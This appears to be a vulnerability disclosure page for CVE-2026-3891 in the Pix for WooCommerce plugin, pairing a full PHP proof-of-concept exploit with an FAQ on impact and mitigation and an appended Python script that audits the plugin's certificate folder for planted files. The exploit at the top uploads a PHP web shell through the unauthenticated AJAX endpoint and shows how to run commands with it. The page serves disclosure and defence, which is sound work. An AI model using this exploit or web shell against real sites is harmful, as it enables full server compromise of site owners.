// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3891 - Pix for WooCommerce <= 1.5.0 - Unauthenticated Arbitrary File Upload
$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';
// Create a temporary PHP web shell file
$php_shell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';
$shell_filename = 'shell_' . bin2hex(random_bytes(4)) . '.php';
// Build multipart form data for the vulnerable endpoint
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
$payload = "--$boundary\r\n";
$payload .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
$payload .= "lkn_pix_for_woocommerce_c6_save_settings\r\n";
// The vulnerable endpoint expects certificate files and other settings
$payload .= "--$boundary\r\n";
$payload .= "Content-Disposition: form-data; name=\"certificate_crt_path\"\r\n\r\n";
$payload .= "uploads/" . $shell_filename . "\r\n";
$payload .= "--$boundary\r\n";
$payload .= "Content-Disposition: form-data; name=\"certificate_key_path\"\r\n\r\n";
$payload .= "uploads/key.pem\r\n";
$payload .= "--$boundary\r\n";
$payload .= "Content-Disposition: form-data; name=\"environment\"\r\n\r\n";
$payload .= "sandbox\r\n";
$payload .= "--$boundary\r\n";
$payload .= "Content-Disposition: form-data; name=\"client_id\"\r\n\r\n";
$payload .= "test_client\r\n";
$payload .= "--$boundary\r\n";
$payload .= "Content-Disposition: form-data; name=\"client_secret\"\r\n\r\n";
$payload .= "test_secret\r\n";
$payload .= "--$boundary\r\n";
$payload .= "Content-Disposition: form-data; name=\"pix_key\"\r\n\r\n";
$payload .= "test_pix_key\r\n";
// Add the malicious file upload
$payload .= "--$boundary\r\n";
$payload .= "Content-Disposition: form-data; name=\"certificate_crt\"; filename=\"" . $shell_filename . "\"\r\n";
$payload .= "Content-Type: application/x-php\r\n\r\n";
$payload .= $php_shell . "\r\n";
$payload .= "--$boundary--\r\n";
// Send the exploit request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
"Content-Type: multipart/form-data; boundary=$boundary",
"X-Requested-With: XMLHttpRequest"
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Check if upload was successful
if ($http_code == 200) {
echo "Exploit attempt completed. HTTP $http_code\n";
echo "Response: " . substr($response, 0, 500) . "\n";
echo "Shell would be uploaded to: /wp-content/uploads/" . $shell_filename . "\n";
echo "Access via: http://vulnerable-site.com/wp-content/uploads/" . $shell_filename . "?cmd=id\n";
} else {
echo "Exploit failed. HTTP $http_code\n";
echo "Response: " . $response . "\n";
}
?>
Frequently Asked Questions
What is CVE-2026-3891?
Understanding the vulnerability
CVE-2026-3891 is a critical vulnerability in the Pix for WooCommerce plugin for WordPress, allowing unauthenticated users to upload arbitrary files to the server. This is due to missing capability checks and file type validation in the ‘lkn_pix_for_woocommerce_c6_save_settings’ function.
How does the vulnerability work?
Mechanics of the exploit
The vulnerability allows attackers to send a POST request to the AJAX endpoint without authentication, which can include malicious files. The plugin does not verify user permissions or validate the file types, leading to potential remote code execution.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Pix for WooCommerce plugin version 1.5.0 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard to determine if they are at risk.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin panel. Look for the Pix for WooCommerce plugin and verify if the version is 1.5.0 or earlier.
What should I do if my site is vulnerable?
Immediate actions to take
If your site is vulnerable, you should immediately update the Pix for WooCommerce plugin to version 1.6.0 or later, which includes a patch for this vulnerability. Regularly updating all plugins is a best practice for security.
What does the CVSS score of 9.8 indicate?
Understanding the severity
The CVSS score of 9.8 signifies that this vulnerability is critical and poses a high risk to affected systems. It indicates that exploitation could lead to severe consequences, including unauthorized access and potential remote code execution.
What is the practical risk of this vulnerability?
Consequences of exploitation
The practical risk includes the potential for attackers to upload malicious files, which could lead to full server compromise. If an attacker successfully uploads a web shell, they could execute commands on the server, compromising the entire site.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept outlines a method for exploiting the vulnerability by crafting a malicious POST request to the vulnerable AJAX endpoint. It illustrates how an attacker can upload a PHP web shell to the server, which could then be used to execute arbitrary commands.
What are the recommended mitigation strategies?
Preventive measures
In addition to updating the plugin, administrators should implement security measures such as limiting file upload capabilities and using web application firewalls. Regular security audits and monitoring for unusual activity are also recommended.
Where can I find more information about CVE-2026-3891?
Further resources
More information about CVE-2026-3891 can be found on the National Vulnerability Database (NVD) or security advisories related to the Pix for WooCommerce plugin. Keeping abreast of security updates from plugin developers is also crucial.
What should I do if I cannot update the plugin immediately?
Short-term measures
If immediate updates are not possible, consider disabling the plugin until a secure version can be installed. Additionally, review server logs for any unauthorized access attempts and strengthen server security configurations.
How can I ensure my WordPress site remains secure?
Long-term security practices
To maintain security, regularly update all plugins and themes, use strong passwords, implement two-factor authentication, and conduct routine security scans. Consider employing security plugins that monitor for vulnerabilities and provide alerts.
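As an added example (not part of the original page or of the plugin), the following Python audit supports the short-term review step above: it walks the Includes/files/certs_c6/ directory that the removed upload code wrote to and reports every file that is not a plain .crt or .key certificate file. The function names, the list of executable extensions, the script markers and the PEM-header check are assumptions of this sketch, and the sample tree is constructed data.

```python
from __future__ import annotations

import os
import tempfile
from pathlib import Path

# Directory the pre-1.6.0 handler copied uploads into, relative to the plugin
# root (from the removed lines of the diff).
LEGACY_CERT_DIR = Path("Includes/files/certs_c6")
# The settings form asks for .crt and .key files only.
ALLOWED_EXTENSIONS = {".crt", ".key"}
# Assumption: inner extensions a web server may still hand to an interpreter.
EXECUTABLE_EXTENSIONS = {".php", ".phtml", ".phar", ".php5", ".php7"}
# Assumption: genuine certificates and keys are PEM-armoured text.
PEM_MARKER = b"-----BEGIN "
# Byte patterns that indicate script content rather than key material.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")
MAX_READ = 1024 * 1024  # read at most 1 MiB per file


def inspect_file(path: Path) -> list[str]:
    """Return the reasons a file looks out of place (empty list if none)."""
    if path.is_symlink():
        return ["symbolic link"]  # never follow links out of the directory
    reasons = []
    suffixes = [s.lower() for s in path.suffixes]
    if not suffixes or suffixes[-1] not in ALLOWED_EXTENSIONS:
        reasons.append("unexpected extension")
    if any(s in EXECUTABLE_EXTENSIONS for s in suffixes[:-1]):
        reasons.append("executable inner extension")
    with path.open("rb") as handle:
        head = handle.read(MAX_READ)
    if any(marker in head.lower() for marker in SCRIPT_MARKERS):
        reasons.append("script content")
    if PEM_MARKER not in head:
        reasons.append("no PEM header")
    return reasons


def audit_legacy_cert_dir(plugin_root) -> dict[str, list[str]]:
    """Map each suspicious file (path relative to certs_c6/) to its reasons."""
    base = Path(plugin_root) / LEGACY_CERT_DIR
    findings: dict[str, list[str]] = {}
    if not base.is_dir():
        return findings  # nothing was ever written by the old handler
    for dirpath, _dirs, files in os.walk(base):  # does not follow dir links
        for name in sorted(files):
            path = Path(dirpath) / name
            reasons = inspect_file(path)
            if reasons:
                findings[path.relative_to(base).as_posix()] = reasons
    return findings


def build_sample_tree(root: Path) -> None:
    """Constructed sample data for the demonstration, not from a real site."""
    certs = root / LEGACY_CERT_DIR
    certs.mkdir(parents=True)
    pem = b"-----BEGIN CERTIFICATE-----\nQ09OU1RSVUNURUQ=\n-----END CERTIFICATE-----\n"
    (certs / "client.crt").write_bytes(pem)
    (certs / "client.key").write_bytes(pem.replace(b"CERTIFICATE", b"CONSTRUCTED KEY"))
    (certs / "notes.php").write_bytes(b"<?php echo 'constructed'; ?>")
    (certs / "cert.php.crt").write_bytes(b"<?PHP echo 'constructed'; ?>")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(Path(tmp))
        for rel_path, why in audit_legacy_cert_dir(tmp).items():
            print(f"{rel_path}: {', '.join(why)}")
```

On a real installation, pass the plugin's own directory as plugin_root; after updating to 1.6.0 the certificates live in the database, so any file still reported here deserves a manual look.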